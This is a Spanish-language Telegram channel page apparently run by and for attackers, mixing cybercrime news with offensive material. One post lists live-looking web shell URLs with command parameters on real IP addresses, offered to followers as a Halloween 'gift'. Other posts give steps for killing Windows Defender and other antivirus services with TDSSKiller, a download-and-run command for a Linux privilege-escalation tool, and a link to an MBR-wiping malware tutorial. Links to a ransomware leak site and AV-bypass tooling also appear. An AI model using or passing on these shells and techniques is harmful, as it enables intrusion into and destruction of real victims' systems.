🎅FSEC INTEL ES 2.0 📡 🏴‍☠️🎄 – Telegram
🎅FSEC INTEL ES 2.0 📡 🏴‍☠️🎄
544 subscribers
271 photos
26 videos
14 files
180 links
Inteligencia de Amenazas de Hackers para Hackers. 📡

Estamos de vuelta!!

X : https://x.com/FsecIntelEs
Download Telegram
Media is too big
VIEW IN TELEGRAM
Autoridades rusas arresta a 3 desarrolladores del Malware Meduza Stealer 🇷🇺🚨

En un operativo sorpresa la policía rusa a interrumpidos en domicilios de 3 miembros clave del grupo de desarrolladores del Stealer Meduza, según medios locales los arrestados son jóvenes expertos en IT y son los encargados de crear y distribuir el Malware por distintos foros y canales de Telegram.

Las detenciones de Hackers rusos en territorio ruso es muy rara ya que este pais es considerado un refugio para los piratas informáticos, esta detención se debe a que el Malware Meduza fue utilizado para atacar a una organización de una region rusa.

De ser declarados culpables los los 3 detenidos pueden pasar hasta 4 años en prisión.

FUENTE:
https://news.1rj.ru/str/IrinaVolk_MVD/5661

#rusia #malware #busted #arrestado #hacker #meduza #stealer
😱7🔥4
             /}
_,---~-LJ,-~-._
,-^ ' ' ' ^:,
: . ' ' :
: /| . /\ ' :
: . //| // \ ' :
: `~` /| `^~` ' ;
: ' //| ' :
: \-_ `~` , ' :
; . \.\_,--,_;^/ , :
: ^-_!^!__/^ , :
:, , . , : -HAPPY HALLOWEEN-
^--_____ . ;` 2025
`^''----`

🎃COMO YA ES TRADICIONAL EN FSEC CADA HALLOWEEN SE REGALA A LOS
FIELES SEGUIDORES ALGUNOS DULCES 🍬
🍭

http://181.13.175.66:50000/irj/bvpnqvnv.jsp?cmd=tasklist
http://179.50.23.109:50000/irj/ygqlsxad.jsp?cmd=tasklist
http://201.217.223.147:50000/irj/ndrwodyt.jsp?cmd=whoami (Linux)
http://186.147.143.210:50000/irj/liqwsjss.jsp?cmd=arp%20-a
https://179.50.81.123/irj/anlrqipw.jsp?cmd=dir
https://186.147.143.203/irj/nhnrxkfs.jsp
https://200.3.166.67//irj/mqreovyt.jsp?cmd=ls (linux)
https://200.85.234.131/irj/vwcsmtgf.jsp?cmd=ls (Linux)
https://200.85.234.133/irj/jdbueorq.jsp (Linux)
http://190.96.113.62:50000/irj/ldcbainy.jsp?cmd=ls%20/tmp (Linux)
http://200.80.201.170:50000/irj/cqgbtqoy.jsp?cmd=whoami (Linux)


💀¡HAPPY HALLOWEEN HAXXORS!🕷
🎃17🔥6😁32😱2👻1🦄1
Según informes recientes cibercriminales rusos se encuentran usando amplimamente el C2 de codigo abierto AdaptixC2. 🇷🇺

Segun un informe de la empresa Silent Push, el submundo cibercriminal ruso se encuentra migrando de Cobalt Strike a AdaptixC2, afiliados de Akira Ransomware han añadido a Adaptix a su arsenal de herramientas.

También se ha observado que el fundador y desarrollador principal del proyecto es de origen ruso y opera un canal en Telegram en el cual tiene una comunidad muy activa en donde sugieren nuevas mejoras y realizan seguimientos de nuevas implementaciones del proyecto Adaptix, si bien no sea llegado a confirmar que el fundador del proyecto llamado RalfHacker tenga vínculos cercanos con cibercriminales se sabe que ha estado metido en el submundo cibercriminal desde hace tiempo.

FUENTE:
https://www.silentpush.com/blog/adaptix-c2/
https://thehackernews.com/2025/10/russian-ransomware-gangs-weaponize-open.html
5👍1
Usando herramienta legitima para remover Software antivirus y Window Defender 🛡👾

Para remover el Software Antivirus vamos a usar una herramienta de Kaspersky llamada TDSSKiller usado para remover Malware del sistema, pero en esta ocasión sera usado para remover el Window defender de nuestro sistema.

🎯 Nombres de servicios a matar:

Windows Defender - windefend
Malwarebytes - MBAMService
Kaspersky - AVP21.3


🎯 Usando herramienta:
TDSSKiller.exe -accepteula -silent -dcsvc <nombre servicio>


Descarga de herramienta:

http://web.archive.org/web/20230606061811/https://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe

#maldev #windef #manual
14
This media is not supported in your browser
VIEW IN TELEGRAM
TRAITOR | automatización para la escalada de privilegios en Linux. 💣🐧

Traitor es una herramienta que automatiza la escalada de privilegios de manera rapida y usando Exploits y configuraciones vulnerables del sistema victima.

🟥 USO:
Descarga binario desde github

wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64 -o traitor


🟥 Exploitacion de manera automática

traitor -a


https://github.com/liamg/traitor/

#github #exploit #prives #linux
🔥11👎21
Busca información de usuarios del extinto foro Breachforums. 🔍

https://bf.based.re/

#osint #breachforums
😱5👎1
MalDev - Master Boot Record Delete 💿☠️

Que tal Haxxors, hoy vamos ha realizar un pequeño Malware para ataques disruptivos el cual lograra afectar la disponibilidad del sistema victima. Vamos a programar nuestro MBR Delete, un pequeño Malware el cual borra el Master Boot Record (MBR) de nuestro disco dejando a nuestra victima sin poder arrancar su sistema operativo.

https://gitlab.com/fsec-vaul/master-boot-record-delete

#maldev #gitlab #tutorial
9
Forwarded from Proxy Bar
CVE-2025-60710
*
LPE в \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration scheduled task.
*
POC


#win #lpe
4🔥3
Una nueva pandilla de Ransomware entra en escena 🔐

Kazu Ransomware se encuentra corriendo en la Darknet, al parecer con un solo miembro proveniente de foros como DarkForums y exploit.in, sea observado que en los últimos meses el usuario que opera bajo el nombre Kazu se encontro vendiendo datos de gobiernos y empresas en distintos foros.

Recientemente el usuario estreno su sitio Kazu Ransomware el cual actualmente cuenta con 3 victimas 2 de esas victimas son servidores del gobierno colombiano:

- Defensoría del Pueblo de Colombia
- Comisión Nacional del Servicio Civil

http://6czlbd2jfiy6765fbnbnzuwuqocg57ebvp3tbm35kib425k4qnmiiiqd.onion/ransom.html

#ransomware #kazu #onion
😁4
Media is too big
VIEW IN TELEGRAM
🚨 La Operacion End Game continua: 1025 servidores desmantelados

Entre el 10 y el 13 de noviembre de 2025, la última fase de la Operación Endgame se coordinó desde la sede de Europol en La Haya. Las acciones se centraron en uno de los mayores ladrones de información, Rhadamanthys, el troyano de acceso remoto VenomRAT y la red de bots Elysium, todos ellos con un papel clave en la ciberdelincuencia internacional. Las autoridades desmantelaron estos tres grandes facilitadores de la ciberdelincuencia.

El principal sospechoso de VenomRAT fue detenido en Grecia el 3 de noviembre de 2025. La infraestructura desmantelada durante los días de la operación era responsable de infectar con malware a cientos de miles de víctimas en todo el mundo.

http://venomlicense.com/
https://operation-endgame.com/
https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down

#opEndGame #europol #venomrat
🔥3
Hacker ruso arrestado en Tailandia, presumiblemente parte de GRU de Rusia. 🇷🇺🚨

Un pirata informático fue arrestado en Tailandia a petición de EEUU, varios titulares de prensa catalogaron al Hacker como un "Hacker mundialmente famosos", se presume que se trata de ALEKSEY VIKTOROVICH LUKASHEV un alto oficial de la Agencia de inteligencia militar rusa (GRU).

En el 2018 el FBI lanzo un aviso de búsqueda en contra de 12 miembros de GRUB por interferir en las Elecciones del 2016, Aleksey figura en la lista como un militar de alto rango que dirige la Unidad 26165 o también conocido como Fancy Bear.

Las autoridades junto con agentes del FBI lograron incautar ordenadores y billeteras de Crypto de Aleksey, actualmente Aleksey se encuentra aguardando su extradición a los EEUU.

https://web.archive.org/web/20250215143547/https://www.fbi.gov/wanted/cyber/aleksey-viktorovich-lukashev/aleksey-viktorovich-lukashev-8-5x11.pdf

#rusia #fancybear #hacker #busted #fbi
🔥8😨1
Media is too big
VIEW IN TELEGRAM
Como parte de la operación internacional "EndGame" autoridades holandesas confiscaron Hardware de Crazyrdp Bulletproof Hosting. 🇳🇱🚨

CrazyRDP fue un servicio de Hosting a prueba de balas ampliamente usado para montar infraestructura de Ransomware, Stealer y Botnets.

Segun las autoridades CrazyRDP operaba como un sofisticado proveedor de alojamiento a prueba de balas que prestaba servicios **comunidad internacional de ciberdelincuencia** con infraestructura diseñada específicamente para resistir las acciones policiales.

https://breached.company/operation-endgame-continues-crazyrdp-bulletproof-hoster-dismantled-as-dutch-police-seize-thousands-of-servers-in-coordinated-cybercrime-crackdown/

#endgame #crazyrdp #busted
🔥7😢41👏1
Ryūjin Protector 🛡

Ryūjin Protector is an open-source Bin2Bin obfuscation, protection, and DRM tool for Windows PE binaries targeting the Intel x64 architecture (x86_64 only).

https://github.com/keowu/Ryujin

#bypassav #maldev #github
🔥9